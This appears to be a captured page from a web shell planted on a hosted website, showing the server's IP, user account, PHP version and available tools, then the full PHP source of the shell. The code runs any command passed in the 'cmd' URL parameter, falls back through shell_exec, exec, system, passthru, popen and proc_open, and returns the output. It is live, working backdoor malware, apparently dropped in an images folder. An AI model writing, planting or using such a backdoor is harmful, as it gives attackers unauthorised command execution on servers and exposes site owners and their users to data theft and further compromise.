| Server IP : 87.98.231.4 / Your IP : 216.73.217.178 [ Web Server : Apache System : Linux webm007.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : grupmartgn ( 667608) PHP Version : 8.5.7 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/grupmartgn/elanartcrafts/images/ |
Upload File : |
<?php
function _ex($c){
$r=null;
if(function_exists('shell_exec')) $r=@shell_exec($c.' 2>&1');
if($r===null&&function_exists('exec')){@exec($c.' 2>&1',$o);$r=implode("\n",$o);}
if($r===null&&function_exists('system')){ob_start();@system($c.' 2>&1');$r=ob_get_clean();}
if($r===null&&function_exists('passthru')){ob_start();@passthru($c.' 2>&1');$r=ob_get_clean();}
if($r===null&&function_exists('popen')){$h=@popen($c.' 2>&1','r');if($h){$r=fread($h,65535);pclose($h);}}
if($r===null&&function_exists('proc_open')){
$p=@proc_open($c,[1=>['pipe','w'],2=>['pipe','w']],$pipes);
if($p){$r=stream_get_contents($pipes[1]);proc_close($p);}
}
return $r;
}
if(!isset($_GET['cmd'])){echo 'OK:'.php_uname();exit;}
$o=_ex($_GET['cmd']);
echo $o===null?'NOFUNC':$o;
?>